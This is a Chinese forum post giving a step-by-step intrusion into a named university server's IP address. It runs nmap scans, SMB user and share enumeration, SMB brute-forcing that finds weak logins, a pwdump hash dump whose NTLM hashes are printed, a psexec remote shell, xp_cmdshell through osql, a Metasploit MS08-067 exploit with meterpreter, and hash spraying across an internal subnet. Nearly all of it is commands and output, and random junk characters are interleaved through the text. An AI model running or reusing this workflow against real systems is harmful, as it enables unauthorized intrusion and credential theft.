广西师范网站http://202.103.242.241/
: A; ^, ]3 k% e
2 u1 U) q0 K! ] oroot@bt:~# nmap -sS -sV 202.103.242.2415 N; y' P& C2 g9 s
. C) k( Q! a/ mStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
4 z3 F% \' }' o( u
. s" q+ |9 `( X$ p" lNmap scan report for bogon (202.103.242.241)0 d% w' X6 `' q5 s3 }0 L
+ g$ v" U. M7 S( t7 ?
Host is up (0.00048s latency).
0 P1 U4 }2 x& N* d# \! F9 y' ~3 T/ \: W& d; G$ p% ^0 P( C/ |( o
Not shown: 993 closed ports+ Z' p+ f" v/ z" W: J7 B/ x4 N* U
' }: H# h3 |% p& @" h9 I2 `+ LPORT STATE SERVICE VERSION* V' B$ |, g) J/ R3 B; |& q- r+ A! t
1 T* N( ~" J4 V( a, ^ B9 j
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)1 {, L0 E' Z- k" i6 T1 u( J% _
8 _0 Q/ K8 x3 D) B0 i) H" `) O: m+ p139/tcp open netbios-ssn1 t! ]7 m- q8 w' {6 Y7 J& l6 q
3 v' Z! b( u% w/ C" v445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
# C0 ?) `1 F6 H( \8 Z. o* G# Y5 `6 n# l
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)7 w- ]+ u% k6 w% _' R+ }
, `6 n: s8 Y4 t4 m) t7 {1026/tcp open msrpc Microsoft Windows RPC
. O) U. `% J o. {( D; B$ C
2 G( ^1 \, v: d: \/ b3372/tcp open msdtc?1 h- ], K0 R' ~: D" e0 o
" v/ @; B' O& A0 P8 }, D3389/tcp open ms-term-serv?
6 e6 L9 |/ u' Y$ Q. p, d3 I) k
8 W# x* x/ x4 J& B& h- a1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
9 k& K$ p: P( p, ISF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r) \/ G& M8 p# `0 _* U& }- f
) j# K4 i' K; o8 w- ^
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions3 a6 f+ H( z5 U6 K. b
; @9 ]% J% |0 PSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
/ i# J2 n( V, H. |! a
, S1 Q. s+ y# t7 ^3 U3 KSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
) t+ F8 ]3 ]- I5 G U+ n2 I/ E6 ]8 O0 o( d- l& d6 B0 M
SF:ptions,6,”hO\n\x000Z”);4 t4 {0 J) a. S) n' Y8 p
; ^% _' b. ]4 p1 f1 j% Q' e' ?0 JMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)8 p# }1 n5 h4 s' m; E
" Y3 l( K- @ Y
Service Info: OS: Windows
: b7 Q# \! Y# |- k- b5 ?# |8 C3 R3 ?/ v
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .8 C1 G# @2 B5 ~. Q( I4 J2 s: ?
8 B& ] a$ c3 e' J1 e2 @! |- F
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds3 e" P% E* S/ V# ?" A7 x4 I6 u
: q5 {- F) i, ~) H1 u7 i. R; W, `
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
8 z+ y9 q3 e' T2 S+ J2 s8 w( U6 l4 \) h9 E& C y% Q& |/ P' _
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse. c& H# e" l H% n. ?- Q
9 H8 n, I6 e0 ~# w-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse q& I } ~6 L
* g ^2 |# c: A; M2 C6 O
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
- k q$ [3 X+ k/ _" u: `) H
, o, b' f7 j5 {2 {- W-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
- L$ A& D% o: u4 f
% f0 e0 y6 D, l8 [1 P$ i-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse" S T" _" |' l% R6 L: H, H6 X
( I2 [- y- q0 v5 I$ J, k
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
4 A. x+ g- X; V) M; ^' R- y2 z
1 ~$ k0 C+ f; T- q/ A-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse5 s# @8 G+ r+ H" ]/ D3 `
# y+ [1 E* t) Z, g0 T
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse6 F5 C# v1 G' B% M; G
" z4 U6 I6 u0 X q9 Y/ E) y5 g. j-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse. B6 x8 z5 b1 X' u6 w
+ q- q! i6 g* I" m* h* Q: {-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
: ~. s1 ]. Q! ` t& Z" ?. {) h: n% l/ [# p4 [; M) T
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse9 H( v R2 N' a; t1 ~( `
+ p' J/ W& o& L' V
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
; L# Y, f4 ~0 q5 B1 k2 d: ? j* g6 G% [- y. B0 a( U
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse+ {3 q4 F1 V% Z0 E. _$ k. o6 m
: c% i w1 z( |2 f) X
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse+ P0 r. J, T! Y9 q
2 o2 j) u0 z& B9 P-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse4 d0 X: V2 Y" j u6 |: W6 b
- v8 D3 W; ^: g0 K" K; k
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
7 d" D6 ^" d0 P1 @ ?. S# }2 W" g
//此乃使用脚本扫描远程机器所存在的账户名
% K& U. k1 H/ E! c2 x Z8 A
8 E2 d- d5 H( o" i+ G* |. d% @+ I! iStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST+ K* K1 E& I% S2 f% |0 k( y! s
2 m- a0 [3 m" W! c( c5 S
Nmap scan report for bogon (202.103.242.241)8 E# k; \& l3 z, [( ]$ S
- ]- `0 A% r5 R) l7 R" ~6 p( j2 u/ Z+ q
Host is up (0.00038s latency).4 L6 r: I/ X; T4 e
4 L5 j# ?7 b i$ j3 ? k
Not shown: 993 closed ports
& h8 g& d j4 k J( u
. L, {0 J2 K8 j4 M# QPORT STATE SERVICE' N1 O- N6 B3 f$ f9 ?8 P3 z8 j
{3 c4 C: `2 I6 W( U9 @" ~/ f135/tcp open msrpc
, B0 J. G- T5 X3 \. T2 \% M4 X
7 V ]& K- V# q) Y139/tcp open netbios-ssn1 t. y$ V# S/ [0 _& ~( g9 Z% M
% i3 }3 H! @1 e6 w R. Q
445/tcp open microsoft-ds
8 u6 | i2 o" j! a. E3 Q$ C: b9 e# y; V) C6 Y
1025/tcp open NFS-or-IIS
' x& @6 U; S g1 t4 n
. r9 Z6 B3 m/ q. ]1 r. u1026/tcp open LSA-or-nterm
& E5 I7 `2 B5 _+ c7 l
7 g! u- p. J/ x" A6 B7 N3372/tcp open msdtc4 `/ d' A3 ^2 w/ h2 X, k
6 n, o6 u& D4 \/ y3389/tcp open ms-term-serv: n6 q; W: M* Z N
" x( c$ f# t4 @3 ^3 o) {MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)4 B6 i8 X! P2 q5 u+ L+ f1 o
7 K* J( l) W1 K: U2 k
Host script results:
3 ~2 B* _; g& o. A9 B- L$ U9 ~3 b4 h7 B% K* H
| smb-enum-users:- t9 E9 H3 p$ ]" E2 h
9 V6 @5 `% U7 k J
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
! a1 _9 w0 t3 }; t$ I4 N
* F! y3 ?- i- m5 xNmap done: 1 IP address (1 host up) scanned in 1.09 seconds% P5 b3 Y6 C; I# }
- Z t+ D% W1 H+ s6 {
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 ; v) q) v) c, L$ y9 u; M- N1 S
/ b% K( v" j7 L% B* E# j- l//查看共享! T" D3 W+ b$ _. a& a
" W+ H; u' _7 x, d9 U- Y
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST. m7 Q, C2 G' t$ U; b
3 F3 R9 T8 m+ m+ M7 ^
Nmap scan report for bogon (202.103.242.241)
9 A* \% h: ]/ Y, T$ P2 r& P) j! r
0 O, `# @( D& `Host is up (0.00035s latency).' G7 B# o# @2 A7 w' H+ B4 U+ V
+ s j' W, C- p! rNot shown: 993 closed ports$ `0 b6 Y* i1 a" \1 |/ S( G9 i
4 [. r7 d7 Y/ P1 F' P
PORT STATE SERVICE
% O) G) u& S' K) o- G, j* X5 K; Q6 R9 z+ m
135/tcp open msrpc
& V, U% k0 ]7 v7 ^7 G/ |$ M k! a6 J7 ^
139/tcp open netbios-ssn. W; F$ [' H$ e0 X7 ~$ X- T4 Q/ B. a
4 v) Y, g; c" j* L445/tcp open microsoft-ds
! r! J* @& z' @+ v/ H9 y0 x# N! _" [. r e/ b; f
1025/tcp open NFS-or-IIS
/ W6 d$ S- y- D* x- R5 Y' ~9 D" d; J3 b5 S. q
1026/tcp open LSA-or-nterm
3 j' l+ r4 u3 U9 ]/ N3 R$ Z6 G' M
! U! A7 I' x0 [( e3372/tcp open msdtc, n) ~4 R7 n$ r9 P
) x2 h- \& l! w. _! I1 x
3389/tcp open ms-term-serv$ D" d% R% [" Z1 B
8 E* ^; {+ J2 [MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)0 p1 N, v# K$ |& q
4 f) w' Z: h+ |3 n2 _Host script results:
3 b/ F1 e* n$ M& A, }" k( o" W/ r
| smb-enum-shares:
2 ?2 r; G1 _( |; k
: K' _3 r# G# o1 h8 a& t6 Z7 Q| ADMIN$5 j% I0 h6 M1 J5 ^
% K8 B( @5 o$ E. _/ B1 {' Z
| Anonymous access: <none>
" s h7 q& G' E' f. K0 e$ G G5 U, G9 ?' i5 I( I8 ?
| C$
+ }2 H; P) R; r+ _' H; }) Y7 v
) o7 a2 B% g9 X8 G' d0 J| Anonymous access: <none>
- O' p$ P+ [( C5 |5 s
$ Z( J, g0 G/ ]( Z6 q5 Y% U* Z0 f| IPC$* R6 h4 S* n, l$ K2 X: c
3 T1 j, n) C4 ?8 F2 M
|_ Anonymous access: READ0 x# L6 O7 T$ F0 y2 z7 A
x$ T6 E* Y3 \! zNmap done: 1 IP address (1 host up) scanned in 1.05 seconds. x7 v6 y3 r( |0 U6 {$ y
5 W$ D' {( Z4 u y& H& I
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 2 @2 i# l( H+ D; Q
; a* b% S/ M) N& x//获取用户密码
5 M. J. c! F$ U' ~0 q, g7 P$ K2 N# L5 f! f' u+ m& t
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
0 V' i1 N. X/ `+ u( G6 H, \& M0 [7 n" f
Nmap scan report for bogon (202.103.242.2418)0 H6 g \. ?! w
& N* z7 B* J1 PHost is up (0.00041s latency).
3 e) @ ~) u. q
8 z; L/ K" z8 v0 w, d( a$ KNot shown: 993 closed ports
7 g( r3 H) p# B5 @
- W& J; Y: _# L3 O3 PPORT STATE SERVICE( j- c9 \) N: m; R
- }/ I' u2 G3 J/ ]/ I1 c2 ?4 e
135/tcp open msrpc2 u8 [& G0 U- x" k! Q/ G2 b9 F
% M4 | d% j% H
139/tcp open netbios-ssn# C( O3 H" H5 ]3 x
1 C5 `3 k* b4 V' a, A: Q
445/tcp open microsoft-ds
& ^/ x& f4 ]( H; a' R! b: {) g) i+ Q/ }' L
1025/tcp open NFS-or-IIS$ p3 T$ _: E( T( w' p* H& a+ i
: C' a T( ]5 U3 {1026/tcp open LSA-or-nterm
$ U. [) y1 B" J% V& n V/ m" ]! Y
! F6 H/ N: P; z" D6 s$ L3372/tcp open msdtc/ F2 M! x: U- ~: H
9 t0 `- u1 c2 M1 z r
3389/tcp open ms-term-serv! i4 s! N0 L5 Y( [5 ]# @2 M
* c4 i' J& r' F6 Y; TMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)6 z9 S& J- C: U0 \7 i5 O
! s, ]/ C" J: q) O5 |. p- K% j" vHost script results:
3 z3 c: M: @6 F, j. _) H7 _+ Q$ R+ j
| smb-brute:
5 H- {* }1 D- n1 l r6 M3 [& S; D' D
administrator:<blank> => Login was successful- Y' r: D( K2 C5 \6 Z' }. T8 v8 G
3 P! I- d; p7 E& \7 R& Y
|_ test:123456 => Login was successful
& W: m% k: e# ]# r) O* H
% Z5 h: i+ S& K; ] E+ hNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
" [6 N- G+ U _, a0 }7 i: R+ {* G: _1 K. L" U$ K
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
- j- J' T* E1 k! v" u; v3 y s( s/ H, E ]3 y, U) i
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
5 f0 S% {; J! Q. e- ~. r& e+ Z8 v, h8 J7 [4 w+ l
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse- B/ } x; v! A) l2 \
* H# z! B/ W2 W2 L7 Q! Z2 P
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
& @# `( R N7 F( D
/ w' S' K/ b5 }' ^) F7 a% }Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
' E+ b' U2 T0 S+ y0 d+ ?0 {" g2 F0 J1 n0 U: x- X5 i4 m
Nmap scan report for bogon (202.103.242.241)4 c7 s2 e$ B |3 |: v
. o( }: {1 H" M6 A( ?1 U4 {Host is up (0.0012s latency).
4 p7 {9 U1 x& W: k6 C" o
2 M" P+ P) c! T4 n% q4 MPORT STATE SERVICE
+ @' [$ ?6 d1 t# g5 w0 U1 V% g1 U4 u5 `6 e3 V$ y9 j
135/tcp open msrpc/ h9 _ ?) d: ^' b' K
4 t4 n& e( ~2 ?. k0 y2 w* Q% ~139/tcp open netbios-ssn- K2 d9 n8 A2 B9 q2 S$ b4 {
$ j a( X7 H8 Q; }& S, l
445/tcp open microsoft-ds
" O; J' h& ~: h1 t
( M2 Z; X O& m! Q+ NMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)* c7 x! @' Z& V' I/ N
8 R# t) w5 P$ \Host script results:( T3 S: P: v$ w* s, _* X
4 ]: e9 e& Y0 r" v( _
| smb-pwdump:. p) X5 y8 ]# H: b% i
) H9 H3 X! O1 l" y, N- g: a, b$ P
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
9 l. k5 |" ?$ ^0 Z$ E3 s( [. w$ C( l2 T! h* R/ E
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************' S* N3 m; o5 }. W" b% m! T! b0 S
$ u+ ~$ t* ~! v+ l0 {
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
+ A' G3 e2 e% Z+ n- c0 c3 {* `3 M# U% }9 k' b
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2/ i9 [5 S) E- m0 U4 o- N
) g7 S9 u5 D E
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
) A; ~- Y% E* K6 `3 r4 f
1 L9 S! X0 P7 I; I0 |. d( ]) |C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
1 z" J, E! J; W& b- v6 J
/ p6 O" e) `/ \) k1 P# o" d8 z-p 123456 -e cmd.exe: j8 y3 v( T6 w/ e8 z; U+ W
% W: R6 j# ]. u. I% i( PPsExec v1.55 – Execute processes remotely, q0 \7 g* _& A' ~1 E
c$ b1 ]2 J2 S
Copyright (C) 2001-2004 Mark Russinovich; e. K, @3 [' T! z- D
- S+ i9 N6 V7 ^: kSysinternals – www.sysinternals.com
* H0 P+ b* X% e& `
4 |$ B6 [+ ?! A( s( o0 H0 a) p/ rMicrosoft Windows 2000 [Version 5.00.2195]
) o: Q8 j* L. N$ u' ?3 p, d
8 E0 A; @# }5 {; i1 ](C) 版权所有 1985-2000 Microsoft Corp.6 h4 \3 O6 u* n3 Y) x1 A! q
' `( R8 V5 s6 V( FC:\WINNT\system32>ipconfig: D v6 ]" S4 s4 l$ ^8 _
! r' Q, G v7 I- t+ B ?! \Windows 2000 IP Configuration
V( `8 ?1 X$ ]$ K4 f) x
$ y( V5 J( B3 S# ?1 A9 NEthernet adapter 本地连接:
3 P6 ?4 `! y: u2 x4 F# G% t
b h7 z- b. Q7 }. z) kConnection-specific DNS Suffix . :: E" } r7 ~. G" s2 x( z& `
2 a/ j* T) k+ C0 @) X5 P# E# G7 C6 WIP Address. . . . . . . . . . . . : 202.103.242.241
5 M/ i( f; l$ M- E7 k [* P9 f- D! r" t7 {0 e; A3 X7 E
Subnet Mask . . . . . . . . . . . : 255.255.255.0. h1 O- s: M( U* V. D3 E
; c0 H: F3 s! c" E
Default Gateway . . . . . . . . . : 202.103.1.1: ~" E' V3 p) C8 t
" B$ |: J9 Q! }: M6 BC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令8 |7 p w! ]* i. n
! b& f7 m; z M3 K# L+ R
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
' ^9 H9 w4 p- L2 i: t& i
2 X& I+ Y: _2 E! b+ j! Y/ DStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
. o( f+ A0 ?) J- I& a* N1 [+ R- G# |9 j# c4 [. v \3 E5 u
Nmap scan report for bogon (202.103.242.241)
9 h% P9 _, u; Q
& t T n% m" l6 s; D; v6 u/ ~Host is up (0.00046s latency)./ c T8 Q9 N& r) r
! M {8 U$ `! g$ ^' u4 `5 R' WNot shown: 993 closed ports
0 s! p% z5 y1 n0 h4 U, D8 A, i$ A. _! A/ ]
PORT STATE SERVICE
5 w& M* W9 E$ F' O C: ~4 b' a/ \$ u/ B1 O9 ?3 b2 j" J) Q8 p6 w
135/tcp open msrpc( Z5 f; J) ?( ^! u l. Y2 G
$ |$ I W5 t* H
139/tcp open netbios-ssn
! A6 |& }6 p# o. }& l) {
. g: {9 a) N4 ^( J2 _0 A) r445/tcp open microsoft-ds; R, r0 e6 ?1 C
5 L* {) F" I O3 c$ w
1025/tcp open NFS-or-IIS% z& C! K4 l, v1 I' X
' E" u) [- V+ ~! f8 l
1026/tcp open LSA-or-nterm, W$ r8 e( S2 l6 H, {/ F4 O
, O" ]. e- G9 i3372/tcp open msdtc$ V. M( _% j9 W0 `
3 Z" \/ g" i/ q3389/tcp open ms-term-serv( S' C0 g& u" u* c6 @
. p$ V' r! n, I& @9 m3 u& C
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)# M( L6 q' w; M/ \$ w
% t- E# {1 q9 T
Host script results:
3 y: A' f/ q* g+ @) Q8 `2 j
- r1 X: W' d1 A' z, s| smb-check-vulns:
9 U3 X$ r: N8 J, e9 l8 t- a. X6 A1 k
|_ MS08-067: VULNERABLE
- z/ B: Y9 O2 h# X9 Q4 X+ q/ i7 V- o& N8 T$ K' T
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds& }+ e( b- b( B3 G( G
/ ~; U3 |: j- B6 rroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
! x D( X3 K k" w7 p$ z
5 O3 z0 y [' I& B( T$ h/ Wmsf > search ms08
+ |, R2 m6 p0 |- N
& c( e% P( n* |* U1 H6 R# P5 omsf > use exploit/windows/smb/ms08_067_netapi, @5 ?! N1 e. F* `. |, A- M! f# M( V
4 y4 M q8 s1 c1 V4 r0 R
msf exploit(ms08_067_netapi) > show options
) U6 _! q/ X" B* d, U4 X* b" l- _0 b2 N& _ ~2 m
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
& w( D/ F7 C% j9 `# }
# p0 g; _ y' y0 ~7 kmsf exploit(ms08_067_netapi) > show payloads* O0 S" ~7 m$ _$ l) n0 ~. ~: ?
& m# a( e M( ^1 H3 ~3 C0 f, amsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
6 O$ \! U+ B3 d- G- o. r
& t7 o0 R E3 n' F4 r! F4 X6 Zmsf exploit(ms08_067_netapi) > exploit, V" i# Y2 S2 L& a; \# z2 q
% R1 k5 W- r; q U' K
meterpreter >8 s/ {0 j8 t6 o9 J- l0 D6 O6 i9 k3 P8 O
" ?4 N9 m) L2 x- @
Background session 2? [y/N] (ctrl+z)
4 J( D) X ^# a5 z0 M. Y( R% T% Z* q$ n; @+ q; e. p
msf exploit(ms08_067_netapi) > sessions -l
, @0 }: n% ^5 t% N3 K$ l8 O6 Z) R- t G8 @3 e% D; l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
7 r5 h6 w8 b4 f
# }- s( v a3 C8 H* U) stest
! [7 q3 T3 \0 s' ]2 j: e o2 O" W* I" j t6 t1 T) R* L
administrator
0 F" c5 X1 W( D# q6 ]' q" i9 v6 s* ^/ B3 F
root@bt:/usr/local/share/nmap/scripts# vim password.txt
4 j/ g" a/ ~2 M* x2 C! a$ y1 c$ ?9 q- v: d: x& V: T
44EFCE164AB921CAAAD3B435B51404EE& j6 u) Y) s: w( R; h: [
% o' R- _3 i& z5 \$ @
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
2 y/ m* I% c2 v# T6 S& M8 f+ F$ w# }3 P, }
//利用用户名跟获取的hash尝试对整段内网进行登录% C4 J }; Q3 N
9 D3 F- e- l+ O/ R8 h; \$ ~Nmap scan report for 192.168.1.105: t0 N/ U4 g$ D4 W
* ^; r0 `* K# g& p/ `* eHost is up (0.00088s latency).
. ?. ~9 ^! H% e y1 g+ E4 W8 P/ z+ b$ ~" P# W# P2 c
Not shown: 993 closed ports
4 |8 c5 f8 A" a1 I, \3 E. @
5 N; U4 C1 \& `! B$ r+ E5 U* I( ]PORT STATE SERVICE, w& G" e; [8 O; c( H) l
7 \2 w4 w+ e: t: q; e- \- G6 Z. z
135/tcp open msrpc+ `- L, ?0 \/ Q0 g
9 @2 D* a; l1 O5 U3 _2 e139/tcp open netbios-ssn$ l2 o7 A( ~! @2 T: @0 R u- a$ h- P
9 S" N! r1 K5 N% H. @! d. J445/tcp open microsoft-ds
$ o# ]/ O, ^ T8 F5 L& L: W5 z4 [
7 K; D& i' g2 [4 \1025/tcp open NFS-or-IIS
6 X9 n3 G7 N7 u7 D
3 Y6 k$ G9 a( r# v. P% o+ |) Z1026/tcp open LSA-or-nterm
# p$ y( N. l4 j; x0 s9 X2 Z
# r* w. y5 V$ v3372/tcp open msdtc1 w( E% a+ F* V+ {
# i) O/ Q2 j, [& c3389/tcp open ms-term-serv" ]4 i( i- E/ D, }
$ |" ~1 s6 s$ Q* yMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)3 u. {2 `$ Y w% z. Q2 a. g! n
, P3 W: O* o( BHost script results:
9 f$ {" r, D G8 |0 m$ b$ {9 K5 c H! R9 E+ I7 o; A
| smb-brute:
, `. M# G5 ?! f0 F
7 l( F0 s6 H C0 u|_ administrator:<blank> => Login was successful
) Q& u7 c u, z* D' c# ?9 h9 n! L( ]" H+ H6 j% h
攻击成功,一个简单的msf+nmap攻击~~·0 V1 F2 y" Q# {! I
1 y3 W7 ?* N) y! o: e |
发表于 2012-12-4 12:46:42
收藏
支持
反对